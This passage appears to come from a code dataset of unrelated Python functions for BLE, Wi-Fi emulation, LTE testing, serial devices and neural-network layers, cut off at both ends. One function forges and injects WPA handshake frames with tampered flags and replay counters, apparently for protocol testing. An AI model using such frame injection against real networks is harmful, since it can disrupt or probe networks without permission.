return False\n self.adv_instances.append(adv_callback)\n return True", "def enable_dcbx_tlv_transmission(self, ports, dcbx_tlvs=\"all\", mode=\"Enabled\"):\n pass", "def _set_up_phy_for_capture(self, usb_speed):\n\n # Set up our ULPI PHY's core functionality: set it powered on, in non-driving mode\n # (so we can snoop), and set the relevant speed.\n self.ulpi_regs.FUNC_CTL = \\\n int(usb_speed) | self.ulpi_regs.FuncCTLFlags.OPERATING_MODE_NON_DRIVING \\\n | self.ulpi_regs.FuncCTLFlags.PHY_POWERED", "def register_layer(key, module):\n register(key, module, layer_dict)", "def simulateNetworkLayer(self, tick):\n if tick == self.mNextTickForPacket:\n f = Frame(self.mPacketSize, tick, self.mPosition)\n self.mMessageQueue.append(f)\n self.mNextTickForPacket = tick + self.delayToNextPacket()", "def setInfraParameters(self, sta, mode, distance):\n station.mode(str(sta), mode)\n \n seconds = 3\n self.src = str(sta)\n try:\n \"\"\"Based on RandomPropagationDelayModel (ns3)\"\"\"\n seconds = abs(mobility.speed[self.src])\n except:\n pass\n self.host = sta\n latency = wifiParameters.latency(distance)\n loss = wifiParameters.loss(distance)\n delay = wifiParameters.delay(distance, seconds)\n bw = wifiParameters.bw(distance, mode) \n self.host.pexec(\"tc qdisc replace dev %s-wlan0 root netem rate %.2fmbit loss %.1f%% latency %.2fms delay %.2fms\" % (sta, bw, loss, latency, delay)) \n #os.system('util/m %s tc qdisc replace dev %s-wlan0 root netem rate %.2fmbit latency %.2fms delay %.2fms' % (self.host, self.host, bandwidth, latency, delay))\n #self.host.cmd(\"tc qdisc replace dev %s-wlan0 root tbf rate %.2fmbit latency %.2fms burst 15k\" % (self.host, rate, latency)) \n associate = self.doAssociation(mode, distance)\n if associate == False:\n mobility.handover(self.host)", "def write_am(self, packet, amid, seqno, timeout=2.0):\n\n # Convert from app-specific packet to ActiveMessage:\n p = ActiveMessage(packet, amid=amid)\n\n # Write to the serial device\n self.write(p, seqno, timeout)", "def createIdlePacket(packetByteSize=PACKET_MIN_BYTE_SIZE):\n # the idle packet is a TM packet without a secondary header (CCSDS)\n # and zeros in the data field and 0 in the sequence counter\n minimumSize = PACKET_MIN_BYTE_SIZE\n if packetByteSize < PACKET_MIN_BYTE_SIZE:\n raise ValueError(\"binary size too small, must be >= \" + str(PACKET_MIN_BYTE_SIZE))\n binaryString = \"\\0\" * packetByteSize\n idlePacket = CCSDS.PACKET.TMpacket(binaryString)\n idlePacket.packetType = CCSDS.PACKET.TM_PACKET_TYPE\n idlePacket.setPacketLength()\n idlePacket.versionNumber = 0\n idlePacket.dataFieldHeaderFlag = 0\n idlePacket.segmentationFlags = CCSDS.PACKET.UNSEGMENTED\n idlePacket.applicationProcessId = CCSDS.PACKET.IDLE_PKT_APID\n idlePacket.sequenceControlCount = 0\n return idlePacket", "def tx_switch_band(self,band1,band2,bwMhz,powerdBm,ud_config=None):\r\r\n self.meas_list = ['EVM']\r\r\n tol_dB = 1\r\r\n\r\r\n earfcn1 = lte_util.ul_Default_EARFCN(band1)\r\r\n\r\r\n if earfcn1 >= 36000:\r\r\n self.setup_tdd(earfcn1,bwMhz,powerdBm,ud_config)\r\r\n else:\r\r\n self.setup_fdd(earfcn1,bwMhz,powerdBm)\r\r\n\r\r\n self.GetTesterMeasurments(exp_powerdBm=powerdBm,\r\r\n tol_dB=tol_dB)\r\r\n\r\r\n self.modemObj.disable_tx()\r\r\n\r\r\n # Set band2\r\r\n earfcn2 = lte_util.ul_Default_EARFCN(band2)\r\r\n self.set_band(band2)\r\r\n self.modemObj.set_rat_band(rat='LTE', band=band2)\r\r\n duplex_mode = self.get_duplex_mode()\r\r\n self.instr.lte_tx.set_duplex_mode(duplex_mode)\r\r\n self.instr.lte_tx.set_band(band2)\r\r\n\r\r\n if duplex_mode == 'TDD':\r\r\n self.set_ud_config(ud_config)\r\r\n self.modemObj.set_ud_config(ud_config)\r\r\n self.instr.lte_tx.set_ul_dl_conf(ud_config)\r\r\n meas_sf = 2\r\r\n self.set_meas_sf(meas_sf)\r\r\n self.instr.lte_tx.conf_measurement_subframe(measSubframe=meas_sf)\r\r\n\r\r\n bursted = duplex_mode == 'TDD' and ud_config != \"TEST1\"\r\r\n self.setup_tdd_trigger(bursted,special_sf_config=0)\r\r\n\r\r\n _,freq_ul2,_ = lte_util.get_lte_ul_dl_freq_band(earfcn2)\r\r\n self.modemObj.set_freqMHz(freqMHz=freq_ul2)\r\r\n self.instr.lte_tx.set_rf_freqMHz(freq_ul2)\r\r\n\r\r\n self.modemObj.enable_tx()\r\r\n\r\r\n self.GetTesterMeasurments(exp_powerdBm=powerdBm,\r\r\n tol_dB=tol_dB)", "def add_layer(self, layer):\n\t\tif isinstance(layer, Layer):\n\t\t\tif layer != self:\n\t\t\t\tself.sublayers.append(layer)\n\t\t\t\tlayer.superlayer = self\n\t\telse:\n\t\t\traise TypeError('Invalid layer object')", "def tx_power(self, sta, iface):\n self.txpower[str(sta)] = sta.cmd('iwconfig %s | grep -o \\'Tx-Power.*\\' | cut -f2- -d\\'=\\''% iface)", "def test_device_on(self):\n self.ms.add_response({'\\x14081031031E226410\\x0D': 'PA\\x0D'})\n # Network / Device ID\n response = self.upb.on((49, 3))\n self.assertTrue(response)", "def test_ic(wire_widths = [0.25, 0.5, 1, 2, 4],\n wire_widths_wide = [0.75, 1.5, 3, 4, 6], pad_size = (200, 200),\n pad_gap = 75, wire_layer = 0, pad_layer = 1, gnd_layer = 1):\n ICS = Device('test_ic')\n\n # if gnd_layer is None: gnd_layer = pad_layer\n translation = 0\n padb = ICS.add_ref(\n rectangle(\n size = (np.size(wire_widths) * (pad_size[0]*6/5), pad_size[1]),\n layer = wire_layer\n )\n )\n\n padb_overlay = ICS.add_ref(\n rectangle(size = ((np.size(wire_widths) * (pad_size[0]*6/5)) * 9/10,\n pad_size[1] * 9/10),\n layer = gnd_layer)\n )\n padb_overlay.center = padb.center\n padb_overlay.ymin = padb.ymin\n for i, x in enumerate(wire_widths_wide):\n padt = ICS.add_ref(rectangle(pad_size, wire_layer))\n padt.xmin = padb.xmin + translation\n padt.ymin = padb.ymax + pad_gap\n padt_overlay = ICS.add_ref(\n rectangle(size = (pad_size[0] * 9/10, pad_size[1] * 9/10),\n layer = pad_layer)\n )\n padt_overlay.center = padt.center\n padt_overlay.ymax = padt.ymax\n difference = padt.ymin-padb.ymax\n wire_step = ICS.add_ref(\n _test_ic_wire_step(wire_widths_wide[i], wire_widths[i],\n wire_layer = wire_layer)\n )\n wire_step.rotate(90)\n wire_step.center = (padt.center[0], padb.ymax + difference/2)\n translation = translation + pad_size[0] * 12/10\n conn_wire_top = ICS.add_ref(\n rectangle(size = (wire_widths_wide[i], padt.ymin-wire_step.ymax),\n layer = wire_layer)\n )\n conn_wire_bottom = ICS.add_ref(\n rectangle(size = (wire_widths_wide[i], wire_step.ymin-padb.ymax),\n layer = wire_layer)\n )\n conn_wire_top.ymax = padt.ymin\n conn_wire_top.xmin = wire_step.xmin\n conn_wire_bottom.ymin = padb.ymax\n conn_wire_bottom.xmin = wire_step.xmin\n\n return ICS", "def add_device(self, noInit=True, **kwargs):\n self.epicsLive.add_device(noInit=noInit, **kwargs)\n aliases = self.epicsLive._aliases\n if not self._det.get('epicsLive'):\n self._det['epicsLive'] = {}\n self._det['epicsLive'].update({'attrs': aliases})", "def draw(self, layer: Layer) -> None:\r\n if layer and layer.layer_index >= self.num_layers:\r\n return\r\n\r\n pyxel.bltm(layer.offset.x, layer.offset.y, self.tilemap_id + layer.layer_index,\r\n self.rect_uv.x, self.rect_uv.y, self.rect_uv.w, self.rect_uv.h,\r\n colkey=layer.transparency_color)", "async def initialize(self, hw_init=False, init_speed: str = \"200 sec / stroke\"):\n await self.pump_io.initialize()\n # Test connectivity by querying the pump's firmware version\n fw_cmd = Protocol1Command(command=\"U\", target_pump_num=self.address)\n self.metadata.version = await self.pump_io.write_and_read_reply_async(fw_cmd)\n logger.info(\n f\"Connected to Hamilton ML600 {self.name} - FW version: {self.metadata.version}!\"\n )\n\n if hw_init:\n await self.initialize_pump(speed=ureg.Quantity(init_speed))", "async def send_panel_req(self, ba, bb):\n if not self.connected:\n return\n\n data = bytearray(10)\n data[0] = M_START\n data[1] = 8\n data[2] = mtypes[BMTS_PANEL_REQ][0]\n data[3] = mtypes[BMTS_PANEL_REQ][1]\n data[4] = mtypes[BMTS_PANEL_REQ][2]\n data[5] = ba\n data[6] = 0\n data[7] = bb\n data[8] = messages.Message.crc(data[1:8])\n data[9] = M_END\n\n self.writer.write(data)\n await self.writer.drain()", "def add_pump(self, name, start_node_name, end_node_name, pump_type='POWER',\n pump_parameter=50.0, speed=1.0, pattern=None, initial_status='OPEN'):\n self._link_reg.add_pump(name, start_node_name, end_node_name, pump_type, \n pump_parameter, speed, pattern, initial_status)", "def __init__( self, address = None, smbus = None ):\n\n if not address: address = self.DEFAULT_I2C_ADDRESS\n self.__address = address\n \n if not bus: bus = self.DEFAULT_BUS\n self.__bus = smbus.SMBus( bus )\n\n self.__bus.write_byte_data( self.address, self.PWR_MGMT_1, self.WAKE )", "async def async_turn_aux_heat_on(self) -> None:\n self._aux = True\n self.async_write_ha_state()", "def RequestUserAttention(self, dc, window, text, rect, pane): \r\n\r\n state = pane.state\r\n pane.state &= ~optionActive\r\n \r\n for indx in xrange(6):\r\n active = (indx%2 == 0 and [True] or [False])[0]\r\n if active:\r\n pane.state |= optionActive\r\n else:\r\n pane.state &= ~optionActive\r\n \r\n self.DrawCaptionBackground(dc, rect, pane)\r\n self.DrawCaption(dc, window, text, rect, pane)\r\n wx.SafeYield()\r\n wx.MilliSleep(350)\r\n\r\n pane.state = state", "def cmndWithDriver(self, commands, time):\n\t\tif self.usesDriver: #don't need to reserve driver..\n\t\t\tcommands.append((hold, self, time))\n\t\t\treturn commands\n\t\telse:\n\t\t\tprio=1\n\t\t\tfor pH in self.plantHeads:\n\t\t\t\tif pH.usesDriver: #set a high priority.\n\t\t\t\t\tprio = 2\n\t\t\tcommands.extend([(request, self, self.driver, prio)])\n\t\t\tself.usesDriver=True #this means that a reservation from the driver has been sent, not that he currently has the attention here.\n\t\t\tif prio==1: #we are \"taking the driver\" from the other device, not from our own heads\n\t\t\t\tswitchTime=self.m.times['switchFocus']\n\t\t\t\tif self.driver.isIdle(): #check for how long he's been idle\n\t\t\t\t\tswitchTime-=self.driver.idleTime()\n\t\t\t\t\tif switchTime<0: switchTime=0\n\t\t\t\tcommands.extend([(hold, self, switchTime)]) #add time to switch focus\n\t\t\t\tself.m.timeConsumption['switchFocus']+=switchTime\n\t\t\tcommands.extend([(hold, self, time)])\n\t\treturn commands", "def __init__(self, dev):\n\n self.dev = dev\n\n # do pygatt communication in the background\n self.gatt = PyGattThread(dev)\n self.gatt.start()", "def run(self):\n cached_char = Characteristic(BLE_TEMP_UUID, BLE_TEMP_HANDLE)\n adapter = GATTToolBackend()\n while True:\n try:\n _LOGGER.debug(\"Connecting to %s\", self.name)\n # We need concurrent connect, so lets not reset the device\n adapter.start(reset_on_start=False)\n # Seems only one connection can be initiated at a time\n with CONNECT_LOCK:\n device = adapter.connect(\n self.mac, CONNECT_TIMEOUT, BLEAddressType.random\n )\n if SKIP_HANDLE_LOOKUP:\n # HACK: inject handle mapping collected offline\n # pylint: disable-next=protected-access\n device._characteristics[UUID(BLE_TEMP_UUID)] = cached_char\n # Magic: writing this makes device happy\n device.char_write_handle(0x1B, bytearray([255]), False)\n device.subscribe(BLE_TEMP_UUID, self._update)\n _LOGGER.info(\"Subscribed to %s\", self.name)\n while self.keep_going:\n # protect against stale connections, just read temperature\n device.char_read(BLE_TEMP_UUID, timeout=CONNECT_TIMEOUT)\n self.event.wait(60)\n break\n except (BLEError, NotConnectedError, NotificationTimeout) as ex:\n _LOGGER.error(\"Exception: %s \", str(ex))\n finally:\n adapter.stop()", "def addWlan(self, station): \n phyInt.phy[station] = phyInt.totalPhy[self.currentPhy][3:]\n os.system(\"iw phy phy%s set netns %s\" % (phyInt.phy[station], station.pid)) \n wif = station.cmd(\"iwconfig 2>&1 | grep IEEE | awk '{print $1}'\").split(\"\\n\")\n wif.pop()\n for iface in wif:\n if iface[:4]==\"wlan\":\n try:\n self.nextWlan[str(station)] += 1\n except:\n self.nextWlan[str(station)] = 0\n netxWlan = self.nextWlan[str(station)] \n self.renameIface(station, netxWlan, iface)\n self.currentPhy+=1", "def add_datamap(self, ctx, datamap):\n zing_state = self._get_zing_tx_state()\n zing_state.datamaps.append((ctx.device(), datamap))", "def broadcast(loopstate):\n cmdstring = 'sudo hcitool -i hci0 cmd ' # Send cmd to hci0\n cmdstring += '0x08 ' # Set group to BLE\n cmdstring += '0x0008 ' # Set command to HCI_LE_Set_Advertising_Data\n cmdstring += '0D ' # Length of entire following data, in bytes\n cmdstring += '02 ' # Length of flag info\n cmdstring += '01 ' # Use AD flags\n cmdstring += '02 ' # Flag value:\n # bit 0 (OFF) LE Limited Discoverable Mode\n # bit 1 (ON) LE General Discoverable Mode\n # bit 2 (OFF) BR/EDR Not Supported\n # bit 3 (ON) Simultaneous LE and BR/EDR to Same Device Capable (controller)\n # bit 4 (ON) Simultaneous LE and BR/EDR to Same Device Capable (Host)\n cmdstring += '09 ' # Length of following message, in bytes\n cmdstring += '07 ' # GAP value (07 = 128 Bit Complete Service UUID List)\n cmdstring += '42 69 63 79 63 6c 65 ' # Header to identify beacon message-\n # - and it's also is Bicycle in ASCII!\n if loopstate:\n cmdstring = cmdstring + LOOP_ON\n else:\n cmdstring = cmdstring + LOOP_OFF + ' >/dev/null 2>&1'\n subprocess.call(cmdstring, shell=True)\n subprocess.call('sudo hciconfig hci0 leadv 3 >/dev/null 2>&1', shell=True)", "def __init__(self, alias, adapter=None):\n\n dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)\n\n self.bus = dbus.SystemBus()\n\n if not adapter:\n adapter = self._find_adapter()\n if not adapter:\n logger.error(\"Could not find any adapter implementing GattManager1 + LEAdvertisingManager1 interfaces\")\n raise BleNotSupportedException(\n \"No adapter implementing GattManager1 + LEAdvertisingManager1 found\")\n self._adapter_path = '/org/bluez/' + adapter\n self._device_properties_changed_signal = None\n self._adapter_properties_changed_signal = None\n self._main_loop = None\n self.on_remote_disconnected = None\n\n self._adapter_props = dbus.Interface(\n self.bus.get_object(BLUEZ_SERVICE_NAME, self._adapter_path), DBUS_PROP_IFACE)\n\n self._disable_br_edr()\n\n logger.info(\"Creating BLE Peripheral with alias: %s\" % alias)\n\n self.alias = alias\n self.is_powered = True\n self.discoverable_timeout = 0\n self.is_advertising = False\n\n # Prepare Managers:\n\n self._ad_manager = dbus.Interface(\n self.bus.get_object(BLUEZ_SERVICE_NAME, self._adapter_path),\n LE_ADVERTISING_MANAGER_IFACE)\n\n self._gatt_manager = dbus.Interface(\n self.bus.get_object(BLUEZ_SERVICE_NAME, self._adapter_path),\n GATT_MANAGER_IFACE)\n\n # Create Advertisement and GATT Application:\n\n self._advertisement = Advertisement(self.bus, 0, 'peripheral')\n self._app = Application(self.bus)", "def transmitPollAck(): \n global data\n DW1000.newTransmit()\n data[0] = C.POLL_ACK\n data[17] = anchorID #data[17] is tag Id data[18] is anchor Id\n data[18] = tagID #data[17] is tag Id data[18] is anchor Id\n DW1000.setDelay(REPLY_DELAY_TIME_US, C.MICROSECONDS)\n DW1000.setData(data, LEN_DATA)\n DW1000.startTransmit()", "def configure(self, attr_dict=None):\n self.free_buf()\n self.__init__(self.phyAddress,self.direction,attr_dict)", "def RequestUserAttention(self, dc, window, text, rect, pane): \r\n \r\n state = pane.state\r\n pane.state &= ~optionActive\r\n \r\n for indx in xrange(6):\r\n active = (indx%2 == 0 and [True] or [False])[0]\r\n if active:\r\n pane.state |= optionActive\r\n else:\r\n pane.state &= ~optionActive\r\n \r\n self.DrawCaptionBackground(dc, rect, pane)\r\n self.DrawCaption(dc, window, text, rect, pane)\r\n wx.SafeYield()\r\n wx.MilliSleep(350)\r\n\r\n pane.state = state", "def _Attention(self, name, is_causal=True):\n p = self.params\n tr_atten_p = TransformerAttentionLayer.Params().Set(\n name='transformer_atten',\n input_dim=p.model_dim,\n hidden_dim=p.attention_hidden_dim or p.model_dim,\n is_masked=is_causal,\n num_heads=p.num_heads,\n residual_dropout_prob=p.residual_dropout_prob,\n atten_dropout_prob=p.atten_dropout_prob,\n fprop_dtype=p.fprop_dtype,\n add_unnormalized_input=p.selfatten_add_unnormalized_input,\n )\n tr_atten_p.atten_tpl.use_bias = p.use_bias\n tr_atten_p.atten_tpl.enable_value_proj = p.selfatten_enable_value_proj\n tr_atten_p.atten_tpl.enable_query_scale = p.enable_query_scale\n tr_atten_p.atten_tpl.enable_per_dim_scale = p.enable_per_dim_scale\n tr_atten_p.atten_tpl.device_mesh = p.device_mesh\n tr_atten_p.atten_tpl.weight_split_dims_mapping = (\n p.weight_split_dims_mapping.dnh)\n tr_atten_p.atten_tpl.activation_split_dims_mapping.blnh = (\n p.activation_split_dims_mapping.blnh)\n tr_atten_p.atten_tpl.activation_split_dims_mapping.bld = (\n p.activation_split_dims_mapping.bld)\n if p.deterministic_dropout:\n tr_atten_p.dropout_tpl = layers.DeterministicDropoutLayer.Params()\n tr_atten_p.atten_p.dropout_tpl = layers.DeterministicDropoutLayer.Params()\n\n return self._Graph(\n name,\n ['i'], # input NestedMap with {vec, paddings}\n ['o'], # output NestedMap with {vec, paddings}\n ('i.vec->split_i',\n self.MeshSplit('input_split', p.activation_split_dims_mapping.bld)),\n ('split_i,split_i,i.paddings->o.vec,unused_prob', tr_atten_p),\n ('i.paddings->o.paddings', self._Id('id')))", "def add_loop_packet(self, packet):\n with self.run_lock:\n self._add_loop_packet(packet)", "def append_or_update_layer(self, layer: 'Layer'):\n if layer.has_pos():\n self.layers[layer.get_pos()] = layer\n else:\n self.layers.append(layer)\n layer.set_pos(self.get_num_layers() - 1)", "def loopattach(diskimg):\n result = subprocess.run(['losetup', '--find', diskimg], check=True)\n return loopdev(diskimg)", "def run_mainloop():\n \n # List of sensor node addresses expected to be in the network\n node_addr = [2, 3]\n \n # Data gathering time parameters [Frequenct data gathering and network discovery for testing]\n data_gathering_interval = 60*1000 # [msec]\n net_discovery_interval = 3 # (re)do network discovery every 3 cycles \n \n # Enable the NM3 power supply on the powermodule\n powermodule = PowerModule()\n powermodule.enable_nm3()\n\n # Enable power supply to 232 driver\n pyb.Pin.board.EN_3V3.on()\n pyb.Pin('Y5', pyb.Pin.OUT, value=0) # enable Y4 Pin as output\n max3221e = MAX3221E(pyb.Pin.board.Y5)\n max3221e.tx_force_on() # Enable Tx Driver\n \n # Wait for 6 seconds to let the modem start up\n print(\"6 second delay to allow the NM3 to boot up...\")\n pyb.delay(6*1000)\n\n # Initialize UART and NM3 object\n uart = machine.UART(1, 9600, bits=8, parity=None, stop=1, timeout=1000)\n modem = Nm3(uart)\n\n # Create and initialize the network protocol object\n net_protocol = gw_node.NetProtocol()\n net_protocol.init(modem, node_addr)\n \n # Start by doing the network discovery and setup\n net_protocol.do_net_discovery()\n net_protocol.setup_net_schedule() # guard interval [msec] can be specified as function input (default: 500)\n \n # Extract network topology and schedule information as JSON\n net_info = net_protocol.get_net_info_json()\n print(net_info) # print it in this test script (send over Wi-Fi in the real app)\n\n # Start an infinite loop, gathering sensor data\n cycle_counter = 0\n while True:\n \n # Perform a cycle of data gathering\n cycle_counter += 1\n frame_start_time = utime.ticks_ms() # update the frame start time\n stay_awake = (cycle_counter == net_discovery_interval) # if this is the last cycle before network re-discovery\n time_till_next_frame = data_gathering_interval # for sleep synchronisation (this can also be variable between frames)\n packets = net_protocol.gather_sensor_data(time_till_next_frame, stay_awake)\n # A list of MessagePacket objects is returned, to be processed and transmitted over Wi-Fi\n \n # If this was the last cycle before network re-discovery\n if (cycle_counter == net_discovery_interval):\n # Do network discovery and setup again (the network should be awake now)\n net_protocol.do_net_discovery()\n net_protocol.setup_net_schedule()\n cycle_counter = 0\n # When finished, instruct the network to sleep until the next frame\n time_till_next_frame = data_gathering_interval - utime.ticks_diff(utime.ticks_ms(), frame_start_time)\n net_protocol.set_network_to_sleep(time_till_next_frame)\n # Extract network topology and schedule information as JSON\n net_info = net_protocol.get_net_info_json()\n print(net_info) # print it in this test script (send over Wi-Fi in the real app)\n\n # Go to sleep yourself until the start of next frame\n # [This will need to be replaced by a proper sleep mode (with powered down modules)]\n time_till_next_frame = data_gathering_interval - utime.ticks_diff(utime.ticks_ms(), frame_start_time)\n pyb.delay(time_till_next_frame)", "def bulb_on():\n tx = zb_explicit_command\n tx[\"dest_addr_long\"] = GE_LINK_BULB_MAC\n tx[\"cluster\"] = CLUSTER_A\n tx[\"data\"] = DATA_ON\n response = zb.Send(tx)", "def connect(self):\n\n self.wm = telnetlib.Telnet(self.ip, self.port, self.timeout)\n time.sleep(2)\n print self.wm.read_very_eager() #clears connection message\n self.measure_chan()", "def imu_init(self, chain: machine.I2C = None, freq=400000, debug=False):\n if self.antenny_config.get(\"use_bno055\"):\n print(\"use_bno055 found in config: {}\".format(self.antenny_config.get_name()))\n if chain is None:\n i2c_bno_scl = self.antenny_config.get(\"i2c_bno_scl\")\n i2c_bno_sda = self.antenny_config.get(\"i2c_bno_sda\")\n self.i2c_bno = self.i2c_init(1, i2c_bno_scl, i2c_bno_sda, freq=freq)\n else:\n self.i2c_bno = chain\n self.imu = Bno055ImuController(\n self.i2c_bno,\n crystal=False,\n address=self.antenny_config.get(\"i2c_bno_address\"),\n sign=(0, 0, 0)\n )\n self.imu_load()\n self.imu.upload_calibration_profile()\n print(\"IMU connected\")\n elif self.antenny_config.get(\"use_bno08x_i2c\"):\n print(\"use_bno08x_i2c found in config: {}\".format(self.antenny_config.get_name()))\n if chain is None:\n i2c_bno_scl = self.antenny_config.get(\"i2c_bno_scl\")\n i2c_bno_sda = self.antenny_config.get(\"i2c_bno_sda\")\n self.i2c_bno = self.i2c_init(1, i2c_bno_scl, i2c_bno_sda, freq=freq)\n else:\n self.i2c_bno = chain\n ps0 = machine.Pin(self.antenny_config.get(\"bno_ps0\"), machine.Pin.OUT)\n ps1 = machine.Pin(self.antenny_config.get(\"bno_ps1\"), machine.Pin.OUT)\n reset = machine.Pin(self.antenny_config.get(\"bno_rst\"), machine.Pin.OUT)\n ps0.off()\n ps1.off()\n self.imu = Bno08xImuController(\n self.i2c_bno,\n debug=debug,\n reset=reset\n )\n self.imu.reset_calibration()\n print(\"IMU connected\")\n elif self.antenny_config.get(\"use_bno08x_rvc\"):\n print(\"use_bno08x_rvc found in config: {}\".format(self.antenny_config.get_name()))\n tx = self.antenny_config.get(\"i2c_bno_scl\")\n rx = self.antenny_config.get(\"i2c_bno_sda\")\n reset = machine.Pin(self.antenny_config.get(\"bno_rst\"), machine.Pin.OUT)\n ps0 = self.antenny_config.get(\"bno_ps0\")\n ps1 = self.antenny_config.get(\"bno_ps1\")\n if ps0 is not None and ps1 is not None:\n ps0 = machine.Pin(ps0, machine.Pin.OUT)\n ps1 = machine.Pin(ps1, machine.Pin.OUT)\n ps0.on()\n ps1.off()\n uart_bno = self.uart_init(1, rx, tx, baud=115200)\n self.imu = Bno08xUARTImuController(\n uart_bno,\n reset=reset\n )\n self.imu.reset_calibration()\n time.sleep(.5)\n self.imu.start()\n print(\"IMU connected\")\n else:\n self.imu = MockImuController()\n print(\"According to your config, ou do not have an IMU connected\")\n return self.imu", "def fw_handshake_2_4_tkip( self , vendor , eapolMIC = True , eapolMICFlag = True , customFlaglist = None , customRC = None ):\n\t\tparameterList = 'vendor=' + str(vendor) + ',eapolMIC=' + str(eapolMIC) + ',eapolMICFlag=' + str(eapolMICFlag) + ',customFlaglist=' + str(customFlaglist) + ',customRC=' + str(customRC)\n\t\tself.logger.log( self.logger.TRANSMIT , 'EAPOL 4-Way Handshake Message 2/4 TKIP (' + parameterList + ')')\n\t\ttry:\n\t\t\n\t\t\t# Create an empty EAPOL WPA Key packet.\n\t\t\tpacket \t\t= EAPOL( version=1 , type='EAPOL-Key' )/EAPOL_Key()/EAPOL_WPAKey()\n\t\t\tpacketKey \t= packet.getlayer( EAPOL_WPAKey )\n\t\t\tif vendor != 'NONE':\n\t\t\t\tvendorInfo = Dot11Elt( ID='vendor' , info=getVendorInfo( type=vendor ) )\n\t\t\tflaglist = ['HMAC_MD5_RC4','idx0','pairwise']\n\t\t\tif eapolMICFlag is True:\n\t\t\t\tflaglist.append('mic')\n\t\t\t\n\t\t\t# Fill in the fields.\n\t\t\tif customFlaglist is not None:\n\t\t\t\tflaglist = customFlaglist\n\t\t\tpacketKey.KeyInfo = self.__getKeyInformation( flaglist )\n\t\t\tif customRC is not None:\n\t\t\t\tif customRC == 'lower':\t\n\t\t\t\t\tself.replayCounter -= 1\n\t\t\t\telif customRC == 'higher':\n\t\t\t\t\tself.replayCounter += 1\n\t\t\tpacketKey.ReplayCounter = self.replayCounter\n\t\t\tpacketKey.Nonce = self.SNonce\n\t\t\tif vendor != 'NONE':\n\t\t\t\tpacketKey.WPAKeyLength \t= len( vendorInfo )\n\t\t\t\tpacketKey.WPAKey \t= vendorInfo\n\t\t\t\n\t\t\t# Calculate and add the MIC.\n\t\t\tif eapolMIC is True:\n\t\t\t\tmic = HMAC.new( self.KCK , msg=str( packet ) , digestmod=Crypto.Hash.MD5 )\n\t\t\t\tpacketKey.WPAKeyMIC = mic.digest()\n\t\t\t\n\t\t\t# Transmit.\n\t\t\tsendp(RadioTap()/\n\t\t\t\tDot11( addr1=self.addr1 , addr2=self.addr2 , addr3=self.addr1 , type='Data' , subtype=0x00 , FCfield='to-DS' )/\n\t\t\t\tLLC( dsap=0xaa , ssap=0xaa , ctrl=0x03 )/\n\t\t\t\tSNAP( OUI=0x000000 , code=0x888e )/\n\t\t\t\tpacket,\n\t\t\t\tiface=self.iface , verbose=False )\n\t\t\t\t\n\t\texcept:\n\t\t\traise", "def train_layer(self, h, t):\n\n mr1h = torch.matmul(h, self.mr1.weight) # h => [m, self.ent_hidden_size], self.mr1 => [self.ent_hidden_size, self.rel_hidden_size]\n mr2t = torch.matmul(t, self.mr2.weight) # t => [m, self.ent_hidden_size], self.mr2 => [self.ent_hidden_size, self.rel_hidden_size]\n\n expanded_h = h.unsqueeze(dim=0).repeat(self.rel_hidden_size, 1, 1) # [self.rel_hidden_size, m, self.ent_hidden_size]\n expanded_t = t.unsqueeze(dim=-1) # [m, self.ent_hidden_size, 1]\n\n temp = (torch.matmul(expanded_h, self.mr.weight.view(self.rel_hidden_size, self.ent_hidden_size, self.ent_hidden_size))).permute(1, 0, 2) # [m, self.rel_hidden_size, self.ent_hidden_size]\n htmrt = torch.squeeze(torch.matmul(temp, expanded_t), dim=-1) # [m, self.rel_hidden_size]\n\n return F.tanh(htmrt + mr1h + mr2t + self.br.weight)", "def Attention_block(up_in,down_in,nf):\n# def MyTile(alpha, channels):\n# alpha = tf.tile(alpha, [1, 1, 1, 1, channels])\n# return alpha\n# def MyTile_output_shape(input_shape):\n# shape = list(input_shape)\n# assert len(shape) == 5 # only valid for 2D tensors\n# shape[-1] *= channels\n# return tuple(shape)\n ndims = len(up_in.get_shape()) - 2\n assert ndims in [1, 2, 3], \"ndims should be one of 1, 2, or 3. found: %d\" % ndims\n input_channels = up_in.get_shape().as_list()[-1]\n# batch_size1 = tf.shape(down_in)[0]\n# nf = tf.min(batch_size0,batch_size1)\n Conv = getattr(KL, 'Conv%dD' % ndims)\n up = Conv(nf, kernel_size=1, padding='same',\n kernel_initializer='he_normal', strides=2)(up_in)\n down = Conv(nf, kernel_size=1, padding='same',\n kernel_initializer='he_normal', strides=1)(down_in)\n\n# x = NCCLayer(channels=nf)([up,down])\n x = Add()([up,down])\n x = Activation('relu')(x)\n x = Conv(1, kernel_size=1, padding='same',\n kernel_initializer='he_normal', use_bias = True, bias_initializer='zeros',strides=1,activation='sigmoid')(x)\n# x = Activation('sigmoid')(x)\n upsample_layer = getattr(KL, 'UpSampling%dD' % ndims)\n alpha = upsample_layer()(x)\n# alpha = Lambda(MyTile)(alpha, input_channels)\n alpha = MyTile(channels=input_channels)(alpha)\n up_out = Multiply()([alpha,up_in])\n return up_out", "def highway_layer(input_data, dim, init, name='', reuse=None,\n activation=tf.nn.relu):\n print(\"Constructing highway layer..\")\n trans = linear(input_data, dim, init, name='trans_{}'.format(name),\n reuse=reuse)\n trans = activation(trans)\n gate = linear(input_data, dim, init, name='gate_{}'.format(name),\n reuse=reuse)\n gate = tf.nn.sigmoid(gate)\n if(dim!=input_data.get_shape()[-1]):\n input_data = linear(input_data, dim, init,name='trans2_{}'.format(name),\n reuse=reuse)\n output = gate * trans + (1-gate) * input_data\n return output", "def ll_uart_set_cmd_timeout(self,timeout = 10):\r\n\r\n self._ll_rx_timeout = timeout", "def do_connect(self):\n # Attempting STA connection\n print('connecting to network...')\n\n self.sta_if.active(True)\n self.sta_if.connect(self.ssid, self.password)\n for retry_count in range(self.num_retries):\n if self.sta_if.isconnected():\n break\n print(\"Waiting for connection {}/{}\".format(retry_count, self.num_retries))\n time.sleep(1)\n\n # Success:\n if self.sta_if.isconnected():\n self.mode = STA_MODE\n print('network config:', self.sta_if.ifconfig())\n for _ in range(self.num_retries):\n try:\n ntptime.settime()\n break\n except:\n pass\n time.sleep(1)\n\n # Failure, starting access point\n else:\n print('Could not connect, creating WiFi access point')\n self.sta_if.active(False)\n self.create_ap()\n self.mode = AP_MODE", "def brief_led_flash(self):\n self._ubx.send('CFG-TP5', pulseLenRatioLock=990000)", "def setup(self,chip,line,mode):\n if len(self.chips[chip]) < line:\n raise ValueError(\"invalid line offset\")\n chip_line = gpio_chips[chip][line]\n if mode == OUT:\n chip_line['direction'] = OUT\n else:\n chip_line['direction'] = IN", "def enterBitBang():\n # Enter bitbang mode\n for i in 